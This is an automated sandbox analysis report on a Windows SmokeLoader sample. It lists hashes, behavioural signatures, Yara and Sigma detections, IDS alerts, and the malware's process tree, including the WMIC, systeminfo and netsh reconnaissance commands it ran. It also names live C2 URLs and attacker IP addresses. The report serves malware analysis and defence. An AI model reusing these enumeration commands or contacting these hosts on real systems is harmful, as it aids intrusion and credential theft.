Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bCnarg2O62.exe

Overview

General Information

Sample name:bCnarg2O62.exe
renamed because original name is a hash value
Original sample name:fa949a7589dc71ea006eb10ad025618a.exe
Analysis ID:1528498
MD5:fa949a7589dc71ea006eb10ad025618a
SHA1:3525508cc8b83cdec2bde0bf0cbdc7cdab62c383
SHA256:fff79a1e96ffcac77b3eb7bc01706bfece7499ab8972b28a732dfa2aa09994ee
Tags:exeStealcuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • bCnarg2O62.exe (PID: 1612 cmdline: "C:\Users\user\Desktop\bCnarg2O62.exe" MD5: FA949A7589DC71EA006EB10AD025618A)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 1D0F.exe (PID: 1308 cmdline: C:\Users\user\AppData\Local\Temp\1D0F.exe MD5: 02F50094664F74B387AC57B1DE8679AF)
      • 9245.exe (PID: 6520 cmdline: C:\Users\user\AppData\Local\Temp\9245.exe MD5: 65AEAA0A0849CB3CE9BC15BCBF0B7B9F)
        • cmd.exe (PID: 2688 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 352 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3192 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1852 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3912 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 504 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5700 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3664 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3844 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1260 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5628 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2912 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6272 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6484 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5772 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • ipconfig.exe (PID: 2032 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • ROUTE.EXE (PID: 1712 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
          • netsh.exe (PID: 6340 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • systeminfo.exe (PID: 2600 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • tasklist.exe (PID: 2080 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • explorer.exe (PID: 2140 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 5652 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 5368 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 5292 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 2164 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 4128 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • derhswe (PID: 2412 cmdline: C:\Users\user\AppData\Roaming\derhswe MD5: FA949A7589DC71EA006EB10AD025618A)
  • derhswe (PID: 888 cmdline: C:\Users\user\AppData\Roaming\derhswe MD5: FA949A7589DC71EA006EB10AD025618A)
  • jfrhswe (PID: 332 cmdline: C:\Users\user\AppData\Roaming\jfrhswe MD5: 02F50094664F74B387AC57B1DE8679AF)
  • msiexec.exe (PID: 7044 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2045303884.000000000050C000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x12b5e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000E.00000002.4174510515.0000000000581000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
    00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      00000008.00000002.2520233894.000000000073D000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x11df7:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      Click to see the 29 entries

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Execution of Suspicious File Type Extension
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\derhswe, CommandLine: C:\Users\user\AppData\Roaming\derhswe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\derhswe, NewProcessName: C:\Users\user\AppData\Roaming\derhswe, OriginalFileName: C:\Users\user\AppData\Roaming\derhswe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\derhswe, ProcessId: 2412, ProcessName: derhswe
      Sigma detected: Local Accounts Discovery
      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2688, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 2912, ProcessName: WMIC.exe
      Sigma detected: Suspicious Network Command
      Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2688, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 1712, ProcessName: ROUTE.EXE

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-08T00:19:56.521297+020020391031A Network Trojan was detected192.168.2.449736109.175.29.3980TCP
      2024-10-08T00:19:57.933998+020020391031A Network Trojan was detected192.168.2.449737109.175.29.3980TCP
      2024-10-08T00:19:58.702026+020020391031A Network Trojan was detected192.168.2.449738109.175.29.3980TCP
      2024-10-08T00:19:59.466827+020020391031A Network Trojan was detected192.168.2.449739109.175.29.3980TCP
      2024-10-08T00:20:00.843226+020020391031A Network Trojan was detected192.168.2.449740109.175.29.3980TCP
      2024-10-08T00:20:01.602248+020020391031A Network Trojan was detected192.168.2.449741109.175.29.3980TCP
      2024-10-08T00:20:02.373195+020020391031A Network Trojan was detected192.168.2.449742109.175.29.3980TCP
      2024-10-08T00:20:03.357049+020020391031A Network Trojan was detected192.168.2.449743109.175.29.3980TCP
      2024-10-08T00:20:04.230689+020020391031A Network Trojan was detected192.168.2.449744109.175.29.3980TCP
      2024-10-08T00:20:05.016635+020020391031A Network Trojan was detected192.168.2.449745109.175.29.3980TCP
      2024-10-08T00:20:05.782303+020020391031A Network Trojan was detected192.168.2.449746109.175.29.3980TCP
      2024-10-08T00:20:06.621612+020020391031A Network Trojan was detected192.168.2.449747109.175.29.3980TCP
      2024-10-08T00:20:07.425060+020020391031A Network Trojan was detected192.168.2.449748109.175.29.3980TCP
      2024-10-08T00:20:08.187550+020020391031A Network Trojan was detected192.168.2.449749109.175.29.3980TCP
      2024-10-08T00:20:08.988328+020020391031A Network Trojan was detected192.168.2.449750109.175.29.3980TCP
      2024-10-08T00:20:09.999180+020020391031A Network Trojan was detected192.168.2.449751109.175.29.3980TCP
      2024-10-08T00:20:10.795484+020020391031A Network Trojan was detected192.168.2.449752109.175.29.3980TCP
      2024-10-08T00:20:11.585121+020020391031A Network Trojan was detected192.168.2.449753109.175.29.3980TCP
      2024-10-08T00:20:12.351541+020020391031A Network Trojan was detected192.168.2.449754109.175.29.3980TCP
      2024-10-08T00:20:13.116137+020020391031A Network Trojan was detected192.168.2.449755109.175.29.3980TCP
      2024-10-08T00:20:14.108812+020020391031A Network Trojan was detected192.168.2.449756109.175.29.3980TCP
      2024-10-08T00:20:14.977527+020020391031A Network Trojan was detected192.168.2.449757109.175.29.3980TCP
      2024-10-08T00:20:15.765843+020020391031A Network Trojan was detected192.168.2.449758109.175.29.3980TCP
      2024-10-08T00:20:16.759382+020020391031A Network Trojan was detected192.168.2.449759109.175.29.3980TCP
      2024-10-08T00:20:19.925424+020020391031A Network Trojan was detected192.168.2.449761109.175.29.3980TCP
      2024-10-08T00:20:20.864927+020020391031A Network Trojan was detected192.168.2.449762109.175.29.3980TCP
      2024-10-08T00:20:21.652306+020020391031A Network Trojan was detected192.168.2.449763109.175.29.3980TCP
      2024-10-08T00:20:22.408715+020020391031A Network Trojan was detected192.168.2.449764109.175.29.3980TCP
      2024-10-08T00:20:23.179852+020020391031A Network Trojan was detected192.168.2.449765109.175.29.3980TCP
      2024-10-08T00:20:23.967118+020020391031A Network Trojan was detected192.168.2.449767109.175.29.3980TCP
      2024-10-08T00:20:24.908316+020020391031A Network Trojan was detected192.168.2.449773109.175.29.3980TCP
      2024-10-08T00:20:26.073161+020020391031A Network Trojan was detected192.168.2.449774109.175.29.3980TCP
      2024-10-08T00:20:26.858013+020020391031A Network Trojan was detected192.168.2.449786109.175.29.3980TCP
      2024-10-08T00:20:42.524219+020020391031A Network Trojan was detected192.168.2.44988223.145.40.168443TCP
      2024-10-08T00:20:43.856995+020020391031A Network Trojan was detected192.168.2.44989023.145.40.168443TCP
      2024-10-08T00:20:44.985987+020020391031A Network Trojan was detected192.168.2.44989823.145.40.168443TCP
      2024-10-08T00:20:45.842246+020020391031A Network Trojan was detected192.168.2.44990223.145.40.168443TCP
      2024-10-08T00:20:46.708528+020020391031A Network Trojan was detected192.168.2.44991323.145.40.168443TCP
      2024-10-08T00:20:47.583687+020020391031A Network Trojan was detected192.168.2.44991923.145.40.168443TCP
      2024-10-08T00:20:49.538695+020020391031A Network Trojan was detected192.168.2.44992523.145.40.168443TCP
      2024-10-08T00:20:50.760609+020020391031A Network Trojan was detected192.168.2.44993123.145.40.168443TCP
      2024-10-08T00:20:51.653515+020020391031A Network Trojan was detected192.168.2.44994123.145.40.168443TCP
      2024-10-08T00:20:52.681299+020020391031A Network Trojan was detected192.168.2.44994823.145.40.168443TCP
      2024-10-08T00:20:53.570072+020020391031A Network Trojan was detected192.168.2.44995423.145.40.168443TCP
      2024-10-08T00:20:55.270683+020020391031A Network Trojan was detected192.168.2.44996023.145.40.168443TCP
      2024-10-08T00:20:56.144229+020020391031A Network Trojan was detected192.168.2.44996623.145.40.168443TCP
      2024-10-08T00:20:57.019675+020020391031A Network Trojan was detected192.168.2.44997223.145.40.168443TCP
      2024-10-08T00:20:57.887464+020020391031A Network Trojan was detected192.168.2.44997823.145.40.168443TCP
      2024-10-08T00:20:58.778951+020020391031A Network Trojan was detected192.168.2.44998423.145.40.168443TCP
      2024-10-08T00:20:59.634156+020020391031A Network Trojan was detected192.168.2.44999423.145.40.168443TCP
      2024-10-08T00:21:01.242575+020020391031A Network Trojan was detected192.168.2.45000123.145.40.168443TCP
      2024-10-08T00:21:02.152391+020020391031A Network Trojan was detected192.168.2.45000723.145.40.168443TCP
      2024-10-08T00:21:03.074243+020020391031A Network Trojan was detected192.168.2.45001323.145.40.168443TCP
      2024-10-08T00:21:11.009960+020020391031A Network Trojan was detected192.168.2.45005023.145.40.168443TCP
      2024-10-08T00:21:33.567262+020020391031A Network Trojan was detected192.168.2.450057109.175.29.3980TCP
      2024-10-08T00:21:35.197944+020020391031A Network Trojan was detected192.168.2.450058109.175.29.3980TCP
      2024-10-08T00:21:37.723611+020020391031A Network Trojan was detected192.168.2.450059109.175.29.3980TCP
      2024-10-08T00:21:39.805320+020020391031A Network Trojan was detected192.168.2.450060109.175.29.3980TCP
      2024-10-08T00:21:52.355257+020020391031A Network Trojan was detected192.168.2.450061109.175.29.3980TCP
      2024-10-08T00:22:08.472860+020020391031A Network Trojan was detected192.168.2.450062109.175.29.3980TCP
      2024-10-08T00:22:27.583209+020020391031A Network Trojan was detected192.168.2.45006323.145.40.168443TCP
      2024-10-08T00:22:30.172982+020020391031A Network Trojan was detected192.168.2.450064211.171.233.12980TCP
      2024-10-08T00:22:49.728426+020020391031A Network Trojan was detected192.168.2.45006523.145.40.168443TCP
      2024-10-08T00:22:52.888320+020020391031A Network Trojan was detected192.168.2.450066211.171.233.12980TCP
      2024-10-08T00:23:14.226648+020020391031A Network Trojan was detected192.168.2.45006723.145.40.168443TCP
      2024-10-08T00:23:20.288275+020020391031A Network Trojan was detected192.168.2.450068211.171.233.12980TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-08T00:20:42.888093+020028098821Malware Command and Control Activity Detected192.168.2.44988223.145.40.168443TCP
      2024-10-08T00:20:44.200827+020028098821Malware Command and Control Activity Detected192.168.2.44989023.145.40.168443TCP
      2024-10-08T00:20:45.235539+020028098821Malware Command and Control Activity Detected192.168.2.44989823.145.40.168443TCP
      2024-10-08T00:20:46.119294+020028098821Malware Command and Control Activity Detected192.168.2.44990223.145.40.168443TCP
      2024-10-08T00:20:46.993552+020028098821Malware Command and Control Activity Detected192.168.2.44991323.145.40.168443TCP
      2024-10-08T00:20:47.872357+020028098821Malware Command and Control Activity Detected192.168.2.44991923.145.40.168443TCP
      2024-10-08T00:20:49.815775+020028098821Malware Command and Control Activity Detected192.168.2.44992523.145.40.168443TCP
      2024-10-08T00:20:51.040714+020028098821Malware Command and Control Activity Detected192.168.2.44993123.145.40.168443TCP
      2024-10-08T00:20:51.921800+020028098821Malware Command and Control Activity Detected192.168.2.44994123.145.40.168443TCP
      2024-10-08T00:20:52.967975+020028098821Malware Command and Control Activity Detected192.168.2.44994823.145.40.168443TCP
      2024-10-08T00:20:53.854687+020028098821Malware Command and Control Activity Detected192.168.2.44995423.145.40.168443TCP
      2024-10-08T00:20:55.555195+020028098821Malware Command and Control Activity Detected192.168.2.44996023.145.40.168443TCP
      2024-10-08T00:20:56.434723+020028098821Malware Command and Control Activity Detected192.168.2.44996623.145.40.168443TCP
      2024-10-08T00:20:57.296278+020028098821Malware Command and Control Activity Detected192.168.2.44997223.145.40.168443TCP
      2024-10-08T00:20:58.168391+020028098821Malware Command and Control Activity Detected192.168.2.44997823.145.40.168443TCP
      2024-10-08T00:20:59.035838+020028098821Malware Command and Control Activity Detected192.168.2.44998423.145.40.168443TCP
      2024-10-08T00:21:00.185280+020028098821Malware Command and Control Activity Detected192.168.2.44999423.145.40.168443TCP
      2024-10-08T00:21:01.521449+020028098821Malware Command and Control Activity Detected192.168.2.45000123.145.40.168443TCP
      2024-10-08T00:21:02.425405+020028098821Malware Command and Control Activity Detected192.168.2.45000723.145.40.168443TCP
      2024-10-08T00:21:03.346072+020028098821Malware Command and Control Activity Detected192.168.2.45001323.145.40.168443TCP
      2024-10-08T00:22:27.911815+020028098821Malware Command and Control Activity Detected192.168.2.45006323.145.40.168443TCP
      2024-10-08T00:22:50.083810+020028098821Malware Command and Control Activity Detected192.168.2.45006523.145.40.168443TCP
      2024-10-08T00:23:14.580007+020028098821Malware Command and Control Activity Detected192.168.2.45006723.145.40.168443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-08T00:20:43.053544+020028298482Potentially Bad Traffic23.145.40.168443192.168.2.449882TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: bCnarg2O62.exeAvira: detected
      Antivirus detection for dropped file
      Source: C:\Users\user\AppData\Roaming\derhsweAvira: detection malicious, Label: HEUR/AGEN.1310247
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeAvira: detection malicious, Label: HEUR/AGEN.1310247
      Source: C:\Users\user\AppData\Roaming\jfrhsweAvira: detection malicious, Label: HEUR/AGEN.1310247
      Found malware configuration
      Source: 00000007.00000002.2263785204.0000000000710000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Roaming\derhsweReversingLabs: Detection: 39%
      Multi AV Scanner detection for submitted file
      Source: bCnarg2O62.exeReversingLabs: Detection: 39%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Roaming\derhsweJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\jfrhsweJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\9245.exeJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: bCnarg2O62.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327A36F0 CryptExportKey,CryptExportKey,10_2_00007FF7327A36F0
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327A3220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,10_2_00007FF7327A3220
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F3098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,12_2_030F3098
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F3717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,12_2_030F3717
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F3E04 RtlCompareMemory,CryptUnprotectData,12_2_030F3E04
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,12_2_030F123B
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F1198 CryptBinaryToStringA,CryptBinaryToStringA,12_2_030F1198
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F11E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,12_2_030F11E1
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_030F1FCE CryptUnprotectData,RtlMoveMemory,12_2_030F1FCE
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0058245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,14_2_0058245E
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00582404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,14_2_00582404
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0058263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,14_2_0058263E
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F225A4 CryptBinaryToStringA,CryptBinaryToStringA,19_2_02F225A4
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F22799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,19_2_02F22799
      Source: bCnarg2O62.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\bCnarg2O62.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49760 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49882 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49890 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49898 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49902 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49913 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49919 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49925 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49931 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49941 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49948 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49954 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49960 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49966 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49972 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49978 version: TLS 1.2
